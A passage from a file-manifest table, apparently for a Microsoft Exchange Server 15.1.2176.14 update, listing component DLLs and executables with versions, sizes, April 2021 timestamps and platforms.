27-Apr-21| 14:40| x86 \nMicrosoft.exchange.diagnostics.service.eventlog.dll| 15.1.2176.14| 215,416| 27-Apr-21| 14:40| x64 \nMicrosoft.exchange.diagnostics.service.exchangejobs.dll| 15.1.2176.14| 193,424| 27-Apr-21| 14:41| x86 \nMicrosoft.exchange.diagnostics.service.exe| 15.1.2176.14| 146,320| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.diagnostics.service.fuseboxperfcounters.dll| 15.1.2176.14| 27,528| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.diagnosticsaggregation.eventlog.dll| 15.1.2176.14| 13,688| 27-Apr-21| 14:40| x64 \nMicrosoft.exchange.diagnosticsaggregationservicelet.dll| 15.1.2176.14| 49,552| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.directory.topologyservice.eventlog.dll| 15.1.2176.14| 28,024| 27-Apr-21| 14:41| x64 \nMicrosoft.exchange.directory.topologyservice.exe| 15.1.2176.14| 208,760| 27-Apr-21| 14:41| x86 \nMicrosoft.exchange.disklocker.events.dll| 15.1.2176.14| 88,968| 27-Apr-21| 14:40| x64 \nMicrosoft.exchange.disklocker.interop.dll| 15.1.2176.14| 32,656| 27-Apr-21| 14:41| x86 \nMicrosoft.exchange.drumtesting.calendarmigration.dll| 15.1.2176.14| 45,960| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.drumtesting.common.dll| 15.1.2176.14| 18,808| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.dxstore.dll| 15.1.2176.14| 473,480| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.dxstore.ha.events.dll| 15.1.2176.14| 206,200| 27-Apr-21| 14:40| x64 \nMicrosoft.exchange.dxstore.ha.instance.exe| 15.1.2176.14| 36,752| 27-Apr-21| 14:41| x86 \nMicrosoft.exchange.eac.flighting.dll| 15.1.2176.14| 131,456| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.edgecredentialsvc.exe| 15.1.2176.14| 21,904| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.edgesync.common.dll| 15.1.2176.14| 148,368| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.edgesync.datacenterproviders.dll| 15.1.2176.14| 220,024| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.edgesync.eventlog.dll| 15.1.2176.14| 23,952| 27-Apr-21| 14:40| x64 \nMicrosoft.exchange.edgesyncsvc.exe| 15.1.2176.14| 97,680| 27-Apr-21| 14:41| x86 \nMicrosoft.exchange.ediscovery.export.dll| 15.1.2176.14| 1,266,056| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.ediscovery.export.dll.deploy| 15.1.2176.14| 1,266,056| 27-Apr-21| 14:40| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.application| Not applicable| 16,518| 27-Apr-21| 14:40| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.exe.deploy| 15.1.2176.14| 87,440| 27-Apr-21| 14:40| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.manifest| Not applicable| 67,459| 27-Apr-21| 14:40| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.strings.dll.deploy| 15.1.2176.14| 52,104| 27-Apr-21| 14:42| Not applicable \nMicrosoft.exchange.ediscovery.mailboxsearch.dll| 15.1.2176.14| 294,280| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.entities.birthdaycalendar.dll| 15.1.2176.14| 73,080| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.entities.booking.defaultservicesettings.dll| 15.1.2176.14| 45,960| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.entities.booking.dll| 15.1.2176.14| 218,488| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.entities.booking.management.dll| 15.1.2176.14| 78,224| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.entities.bookings.dll| 15.1.2176.14| 35,720| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.entities.calendaring.dll| 15.1.2176.14| 932,216| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.entities.common.dll| 15.1.2176.14| 336,248| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.entities.connectors.dll| 15.1.2176.14| 52,624| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.entities.contentsubmissions.dll| 15.1.2176.14| 32,144| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.entities.context.dll| 15.1.2176.14| 60,792| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.entities.datamodel.dll| 15.1.2176.14| 854,408| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.entities.fileproviders.dll| 15.1.2176.14| 291,704| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.entities.foldersharing.dll| 15.1.2176.14| 39,304| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.entities.holidaycalendars.dll| 15.1.2176.14| 76,168| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.entities.insights.dll| 15.1.2176.14| 166,800| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.entities.meetinglocation.dll| 15.1.2176.14| 1,486,712| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.entities.meetingparticipants.dll| 15.1.2176.14| 122,248| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.entities.meetingtimecandidates.dll| 15.1.2176.14| #########| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.entities.onlinemeetings.dll| 15.1.2176.14| 264,064| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.entities.people.dll| 15.1.2176.14| 37,768| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.entities.peopleinsights.dll| 15.1.2176.14| 186,744| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.entities.reminders.dll| 15.1.2176.14| 64,376| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.entities.schedules.dll| 15.1.2176.14| 83,832| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.entities.shellservice.dll| 15.1.2176.14| 63,888| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.entities.tasks.dll| 15.1.2176.14| 100,216| 27-Apr-21| 14:41| x86 \nMicrosoft.exchange.entities.xrm.dll| 15.1.2176.14| 144,760| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.entityextraction.calendar.dll| 15.1.2176.14| 270,216| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.eserepl.common.dll| 15.1.2176.14| 15,248| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.eserepl.configuration.dll| 15.1.2176.14| 15,760| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.eserepl.dll| 15.1.2176.14| 130,440| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.ews.configuration.dll| 15.1.2176.14| 254,352| 27-Apr-21| 14:41| x86 \nMicrosoft.exchange.exchangecertificate.eventlog.dll| 15.1.2176.14| 13,200| 27-Apr-21| 14:41| x64 \nMicrosoft.exchange.exchangecertificateservicelet.dll| 15.1.2176.14| 37,264| 27-Apr-21| 14:41| x86 \nMicrosoft.exchange.extensibility.internal.dll| 15.1.2176.14| 640,912| 27-Apr-21| 14:39| x86 \nMicrosoft.exchange.extensibility.partner.dll| 15.1.2176.14| 37,256| 27-Apr-21| 14:39| x86 \nMicrosoft.exchange.federateddirectory.dll| 15.1.2176.14| 146,312| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.ffosynclogmsg.dll| 15.1.2176.14| 13,184| 27-Apr-21| 14:40| x64 \nMicrosoft.exchange.frontendhttpproxy.dll| 15.1.2176.14| 594,320| 27-Apr-21| 14:41| x86 \nMicrosoft.exchange.frontendhttpproxy.eventlogs.dll| 15.1.2176.14| 14,728| 27-Apr-21| 14:41| x64 \nMicrosoft.exchange.frontendtransport.monitoring.dll| 15.1.2176.14| 30,088| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.griffin.variantconfiguration.dll| 15.1.2176.14| 99,720| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.hathirdpartyreplication.dll| 15.1.2176.14| 42,360| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.helpprovider.dll| 15.1.2176.14| 40,336| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.httpproxy.addressfinder.dll| 15.1.2176.14| 54,152| 27-Apr-21| 14:41| x86 \nMicrosoft.exchange.httpproxy.common.dll| 15.1.2176.14| 163,712| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.httpproxy.diagnostics.dll| 15.1.2176.14| 58,744| 27-Apr-21| 14:41| x86 \nMicrosoft.exchange.httpproxy.flighting.dll| 15.1.2176.14| 204,168| 27-Apr-21| 14:39| x86 \nMicrosoft.exchange.httpproxy.passivemonitor.dll| 15.1.2176.14| 17,808| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.httpproxy.proxyassistant.dll| 15.1.2176.14| 30,600| 27-Apr-21| 14:41| x86 \nMicrosoft.exchange.httpproxy.routerefresher.dll| 15.1.2176.14| 38,800| 27-Apr-21| 14:41| x86 \nMicrosoft.exchange.httpproxy.routeselector.dll| 15.1.2176.14| 48,520| 27-Apr-21| 14:41| x86 \nMicrosoft.exchange.httpproxy.routing.dll| 15.1.2176.14| 180,624| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.httpredirectmodules.dll| 15.1.2176.14| 36,752| 27-Apr-21| 14:41| x86 \nMicrosoft.exchange.httputilities.dll| 15.1.2176.14| 25,992| 27-Apr-21| 14:41| x86 \nMicrosoft.exchange.hygiene.data.dll| 15.1.2176.14| 1,868,144| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.hygiene.diagnosisutil.dll| 15.1.2176.14| 54,648| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.hygiene.eopinstantprovisioning.dll| 15.1.2176.14| 35,704| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.idserialization.dll| 15.1.2176.14| 35,728| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.imap4.eventlog.dll| 15.1.2176.14| 18,312| 27-Apr-21| 14:40| x64 \nMicrosoft.exchange.imap4.eventlog.dll.fe| 15.1.2176.14| 18,312| 27-Apr-21| 14:40| Not applicable \nMicrosoft.exchange.imap4.exe| 15.1.2176.14| 263,048| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.imap4.exe.fe| 15.1.2176.14| 263,048| 27-Apr-21| 14:40| Not applicable \nMicrosoft.exchange.imap4service.exe| 15.1.2176.14| 24,976| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.imap4service.exe.fe| 15.1.2176.14| 24,976| 27-Apr-21| 14:40| Not applicable \nMicrosoft.exchange.imapconfiguration.dl1| 15.1.2176.14| 53,136| 27-Apr-21| 14:39| Not applicable \nMicrosoft.exchange.inference.common.dll| 15.1.2176.14| 216,968| 27-Apr-21| 14:39| x86 \nMicrosoft.exchange.inference.hashtagsrelevance.dll| 15.1.2176.14| 32,144| 27-Apr-21| 14:41| x64 \nMicrosoft.exchange.inference.peoplerelevance.dll| 15.1.2176.14| 281,992| 27-Apr-21| 14:39| x86 \nMicrosoft.exchange.inference.ranking.dll| 15.1.2176.14| 18,832| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.inference.safetylibrary.dll| 15.1.2176.14| 83,832| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.inference.service.eventlog.dll| 15.1.2176.14| 15,240| 27-Apr-21| 14:40| x64 \nMicrosoft.exchange.infoworker.assistantsclientresources.dll| 15.1.2176.14| 94,088| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.infoworker.common.dll| 15.1.2176.14| 1,840,520| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.infoworker.eventlog.dll| 15.1.2176.14| 71,568| 27-Apr-21| 14:41| x64 \nMicrosoft.exchange.infoworker.meetingvalidator.dll| 15.1.2176.14| 175,496| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.instantmessaging.dll| 15.1.2176.14| 45,944| 27-Apr-21| 14:41| x86 \nMicrosoft.exchange.irm.formprotector.dll| 15.1.2176.14| 159,624| 27-Apr-21| 14:40| x64 \nMicrosoft.exchange.irm.msoprotector.dll| 15.1.2176.14| 51,080| 27-Apr-21| 14:40| x64 \nMicrosoft.exchange.irm.ofcprotector.dll| 15.1.2176.14| 45,960| 27-Apr-21| 14:41| x64 \nMicrosoft.exchange.isam.databasemanager.dll| 15.1.2176.14| 30,600| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.isam.esebcli.dll| 15.1.2176.14| 100,240| 27-Apr-21| 14:40| x64 \nMicrosoft.exchange.jobqueue.eventlog.dll| 15.1.2176.14| 13,176| 27-Apr-21| 14:41| x64 \nMicrosoft.exchange.jobqueueservicelet.dll| 15.1.2176.14| 271,248| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.killswitch.dll| 15.1.2176.14| 22,416| 27-Apr-21| 14:39| x86 \nMicrosoft.exchange.killswitchconfiguration.dll| 15.1.2176.14| 33,672| 27-Apr-21| 14:39| x86 \nMicrosoft.exchange.loganalyzer.analyzers.auditing.dll| 15.1.2176.14| 18,296| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.loganalyzer.analyzers.certificatelog.dll| 15.1.2176.14| 15,224| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.loganalyzer.analyzers.cmdletinfralog.dll| 15.1.2176.14| 27,536| 27-Apr-21| 14:41| x86 \nMicrosoft.exchange.loganalyzer.analyzers.easlog.dll| 15.1.2176.14| 30,600| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.loganalyzer.analyzers.ecplog.dll| 15.1.2176.14| 22,392| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.loganalyzer.analyzers.eventlog.dll| 15.1.2176.14| 66,448| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.loganalyzer.analyzers.ewslog.dll| 15.1.2176.14| 29,568| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.loganalyzer.analyzers.griffinperfcounter.dll| 15.1.2176.14| 19,856| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.loganalyzer.analyzers.groupescalationlog.dll| 15.1.2176.14| 20,368| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.loganalyzer.analyzers.httpproxylog.dll| 15.1.2176.14| 19,344| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.loganalyzer.analyzers.hxservicelog.dll| 15.1.2176.14| 34,184| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.loganalyzer.analyzers.iislog.dll| 15.1.2176.14| 103,808| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.loganalyzer.analyzers.lameventlog.dll| 15.1.2176.14| 31,608| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.loganalyzer.analyzers.migrationlog.dll| 15.1.2176.14| 15,736| 27-Apr-21| 14:41| x86 \nMicrosoft.exchange.loganalyzer.analyzers.oabdownloadlog.dll| 15.1.2176.14| 20,872| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.loganalyzer.analyzers.oauthcafelog.dll| 15.1.2176.14| 16,264| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.loganalyzer.analyzers.outlookservicelog.dll| 15.1.2176.14| 49,040| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.loganalyzer.analyzers.owaclientlog.dll| 15.1.2176.14| 44,432| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.loganalyzer.analyzers.owalog.dll| 15.1.2176.14| 38,288| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.loganalyzer.analyzers.perflog.dll| 15.1.2176.14| #########| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.loganalyzer.analyzers.pfassistantlog.dll| 15.1.2176.14| 29,072| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.loganalyzer.analyzers.rca.dll| 15.1.2176.14| 21,368| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.loganalyzer.analyzers.restlog.dll| 15.1.2176.14| 24,456| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.loganalyzer.analyzers.store.dll| 15.1.2176.14| 15,248| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.loganalyzer.analyzers.transportsynchealthlog.dll| 15.1.2176.14| 21,880| 27-Apr-21| 14:41| x86 \nMicrosoft.exchange.loganalyzer.core.dll| 15.1.2176.14| 89,472| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.loganalyzer.extensions.auditing.dll| 15.1.2176.14| 20,856| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.loganalyzer.extensions.certificatelog.dll| 15.1.2176.14| 26,504| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.loganalyzer.extensions.cmdletinfralog.dll| 15.1.2176.14| 21,368| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.loganalyzer.extensions.common.dll| 15.1.2176.14| 28,024| 27-Apr-21| 14:41| x86 \nMicrosoft.exchange.loganalyzer.extensions.easlog.dll| 15.1.2176.14| 28,560| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.loganalyzer.extensions.errordetection.dll| 15.1.2176.14| 36,232| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.loganalyzer.extensions.ewslog.dll| 15.1.2176.14| 16,760| 27-Apr-21| 14:41| x86 \nMicrosoft.exchange.loganalyzer.extensions.griffinperfcounter.dll| 15.1.2176.14| 19,848| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.loganalyzer.extensions.groupescalationlog.dll| 15.1.2176.14| 15,224| 27-Apr-21| 14:41| x86 \nMicrosoft.exchange.loganalyzer.extensions.httpproxylog.dll| 15.1.2176.14| 17,288| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.loganalyzer.extensions.hxservicelog.dll| 15.1.2176.14| 19,840| 27-Apr-21| 14:41| x86 \nMicrosoft.exchange.loganalyzer.extensions.iislog.dll| 15.1.2176.14| 57,216| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.loganalyzer.extensions.migrationlog.dll| 15.1.2176.14| 17,784| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.loganalyzer.extensions.oabdownloadlog.dll| 15.1.2176.14| 18,824| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.loganalyzer.extensions.oauthcafelog.dll| 15.1.2176.14| 16,264| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.loganalyzer.extensions.outlookservicelog.dll| 15.1.2176.14| 17,784| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.loganalyzer.extensions.owaclientlog.dll| 15.1.2176.14| 15,224| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.loganalyzer.extensions.owalog.dll| 15.1.2176.14| 15,224| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.loganalyzer.extensions.perflog.dll| 15.1.2176.14| 52,600| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.loganalyzer.extensions.pfassistantlog.dll| 15.1.2176.14| 18,296| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.loganalyzer.extensions.rca.dll| 15.1.2176.14| 34,168| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.loganalyzer.extensions.restlog.dll| 15.1.2176.14| 17,272| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.loganalyzer.extensions.store.dll| 15.1.2176.14| 18,808| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.loganalyzer.extensions.transportsynchealthlog.dll| 15.1.2176.14| 43,384| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.loguploader.dll| 15.1.2176.14| 165,264| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.loguploaderproxy.dll| 15.1.2176.14| 54,672| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.mailboxassistants.assistants.dll| 15.1.2176.14| 9,061,256| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.mailboxassistants.attachmentthumbnail.dll| 15.1.2176.14| 33,168| 27-Apr-21| 14:41| x86 \nMicrosoft.exchange.mailboxassistants.common.dll| 15.1.2176.14| 124,296| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.mailboxassistants.crimsonevents.dll| 15.1.2176.14| 82,808| 27-Apr-21| 14:41| x64 \nMicrosoft.exchange.mailboxassistants.eventlog.dll| 15.1.2176.14| 14,200| 27-Apr-21| 14:41| x64 \nMicrosoft.exchange.mailboxassistants.rightsmanagement.dll| 15.1.2176.14| 30,088| 27-Apr-21| 14:41| x86 \nMicrosoft.exchange.mailboxloadbalance.dll| 15.1.2176.14| 661,384| 27-Apr-21| 14:41| x86 \nMicrosoft.exchange.mailboxloadbalance.serverstrings.dll| 15.1.2176.14| 63,368| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.mailboxreplicationservice.calendarsyncprovider.dll| 15.1.2176.14| 175,504| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.mailboxreplicationservice.common.dll| 15.1.2176.14| 2,784,144| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.mailboxreplicationservice.complianceprovider.dll| 15.1.2176.14| 53,104| 27-Apr-21| 14:41| x86 \nMicrosoft.exchange.mailboxreplicationservice.contactsyncprovider.dll| 15.1.2176.14| 151,952| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.mailboxreplicationservice.dll| 15.1.2176.14| 966,032| 27-Apr-21| 14:41| x86 \nMicrosoft.exchange.mailboxreplicationservice.easprovider.dll| 15.1.2176.14| 185,208| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.mailboxreplicationservice.eventlog.dll| 15.1.2176.14| 31,632| 27-Apr-21| 14:41| x64 \nMicrosoft.exchange.mailboxreplicationservice.googledocprovider.dll| 15.1.2176.14| 39,816| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.mailboxreplicationservice.imapprovider.dll| 15.1.2176.14| 105,848| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.mailboxreplicationservice.mapiprovider.dll| 15.1.2176.14| 94,584| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.mailboxreplicationservice.popprovider.dll| 15.1.2176.14| 43,384| 27-Apr-21| 14:41| x86 \nMicrosoft.exchange.mailboxreplicationservice.proxyclient.dll| 15.1.2176.14| 18,824| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.mailboxreplicationservice.proxyservice.dll| 15.1.2176.14| 172,928| 27-Apr-21| 14:41| x86 \nMicrosoft.exchange.mailboxreplicationservice.pstprovider.dll| 15.1.2176.14| 102,776| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.mailboxreplicationservice.remoteprovider.dll| 15.1.2176.14| 98,680| 27-Apr-21| 14:41| x86 \nMicrosoft.exchange.mailboxreplicationservice.storageprovider.dll| 15.1.2176.14| 188,296| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.mailboxreplicationservice.syncprovider.dll| 15.1.2176.14| 43,384| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.mailboxreplicationservice.xml.dll| 15.1.2176.14| 447,352| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.mailboxreplicationservice.xrmprovider.dll| 15.1.2176.14| 89,992| 27-Apr-21| 14:41| x86 \nMicrosoft.exchange.mailboxtransport.monitoring.dll| 15.1.2176.14| 107,904| 27-Apr-21| 14:41| x86 \nMicrosoft.exchange.mailboxtransport.storedriveragents.dll| 15.1.2176.14| 371,064| 27-Apr-21| 14:41| x86 \nMicrosoft.exchange.mailboxtransport.storedrivercommon.dll| 15.1.2176.14| 193,912| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.mailboxtransport.storedriverdelivery.dll| 15.1.2176.14| 551,800| 27-Apr-21| 14:41| x86 \nMicrosoft.exchange.mailboxtransport.storedriverdelivery.eventlog.dll| 15.1.2176.14| 16,264| 27-Apr-21| 14:41| x64 \nMicrosoft.exchange.mailboxtransport.submission.eventlog.dll| 15.1.2176.14| 15,752| 27-Apr-21| 14:40| x64 \nMicrosoft.exchange.mailboxtransport.submission.storedriversubmission.dll| 15.1.2176.14| 321,424| 27-Apr-21| 14:41| x86 \nMicrosoft.exchange.mailboxtransport.submission.storedriversubmission.eventlog.dll| 15.1.2176.14| 17,800| 27-Apr-21| 14:41| x64 \nMicrosoft.exchange.mailboxtransport.syncdelivery.dll| 15.1.2176.14| 45,448| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.mailboxtransportwatchdogservicelet.dll| 15.1.2176.14| 18,304| 27-Apr-21| 14:41| x86 \nMicrosoft.exchange.mailboxtransportwatchdogservicelet.eventlog.dll| 15.1.2176.14| 12,664| 27-Apr-21| 14:41| x64 \nMicrosoft.exchange.managedlexruntime.mppgruntime.dll| 15.1.2176.14| 20,880| 27-Apr-21| 14:39| x86 \nMicrosoft.exchange.management.activedirectory.dll| 15.1.2176.14| 415,096| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.management.classificationdefinitions.dll| 15.1.2176.14| 1,269,648| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.management.compliancepolicy.dll| 15.1.2176.14| 39,288| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.management.controlpanel.basics.dll| 15.1.2176.14| 433,032| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.management.controlpanel.dll| 15.1.2176.14| 4,560,264| 27-Apr-21| 14:39| x86 \nMicrosoft.exchange.management.controlpanel.owaoptionstrings.dll| 15.1.2176.14| 261,008| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.management.controlpanelmsg.dll| 15.1.2176.14| 33,664| 27-Apr-21| 14:41| x64 \nMicrosoft.exchange.management.deployment.analysis.dll| 15.1.2176.14| 94,072| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.management.deployment.dll| 15.1.2176.14| 591,248| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.management.deployment.xml.dll| 15.1.2176.14| 3,560,840| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.management.detailstemplates.dll| 15.1.2176.14| 67,976| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.management.dll| 15.1.2176.14| #########| 27-Apr-21| 14:41| x86 \nMicrosoft.exchange.management.edge.systemmanager.dll| 15.1.2176.14| 58,744| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.management.infrastructure.asynchronoustask.dll| 15.1.2176.14| 23,944| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.management.jitprovisioning.dll| 15.1.2176.14| 101,768| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.management.migration.dll| 15.1.2176.14| 544,120| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.management.mobility.dll| 15.1.2176.14| 305,040| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.management.nativeresources.dll| 15.1.2176.14| 131,976| 27-Apr-21| 14:41| x64 \nMicrosoft.exchange.management.powershell.support.dll| 15.1.2176.14| 418,704| 27-Apr-21| 14:41| x86 \nMicrosoft.exchange.management.provisioning.dll| 15.1.2176.14| 275,848| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.management.psdirectinvoke.dll| 15.1.2176.14| 70,520| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.management.rbacdefinition.dll| 15.1.2176.14| 7,873,936| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.management.recipient.dll| 15.1.2176.14| 1,501,072| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.management.reportingwebservice.dll| 15.1.2176.14| 145,272| 27-Apr-21| 14:39| x86 \nMicrosoft.exchange.management.reportingwebservice.eventlog.dll| 15.1.2176.14| 13,696| 27-Apr-21| 14:42| x64 \nMicrosoft.exchange.management.snapin.esm.dll| 15.1.2176.14| 71,544| 27-Apr-21| 14:41| x86 \nMicrosoft.exchange.management.systemmanager.dll| 15.1.2176.14| 1,249,144| 27-Apr-21| 14:41| x86 \nMicrosoft.exchange.management.transport.dll| 15.1.2176.14| 1,876,880| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.managementgui.dll| 15.1.2176.14| 5,225,872| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.managementmsg.dll| 15.1.2176.14| 36,232| 27-Apr-21| 14:41| x64 \nMicrosoft.exchange.mapihttpclient.dll| 15.1.2176.14| 117,632| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.mapihttphandler.dll| 15.1.2176.14| 209,792| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.messagesecurity.dll| 15.1.2176.14| 79,736| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.messagesecurity.messagesecuritymsg.dll| 15.1.2176.14| 17,296| 27-Apr-21| 14:41| x64 \nMicrosoft.exchange.messagingpolicies.dlppolicyagent.dll| 15.1.2176.14| 156,048| 27-Apr-21| 14:42| x86 \nMicrosoft.exchange.messagingpolicies.edgeagents.dll| 15.1.2176.14| 65,936| 27-Apr-21| 14:41| x86 \nMicrosoft.exchange.messagingpolicies.eventlog.dll| 15.1.2176.14| 30,600| 27-Apr-21| 14:41| x64 \nMicrosoft.exchange.messagingpolicies.filtering.dll| 15.1.2176.14| 58,232| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.messagingpolicies.hygienerules.dll| 15.1.2176.14| 29,560| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.messagingpolicies.journalagent.dll| 15.1.2176.14| 175,504| 27-Apr-21| 14:39| x86 \nMicrosoft.exchange.messagingpolicies.redirectionagent.dll| 15.1.2176.14| 28,560| 27-Apr-21| 14:39| x86 \nMicrosoft.exchange.messagingpolicies.retentionpolicyagent.dll| 15.1.2176.14| 75,128| 27-Apr-21| 14:40| x86 \nMicrosoft.exchange.messagingpolicies.rmsvcagent.dll| 15.1.2176.14| 207,240| 27-Apr-21| 14:42| x86 \nMicrosoft.exchange.messagingpolicies.rules.dll| 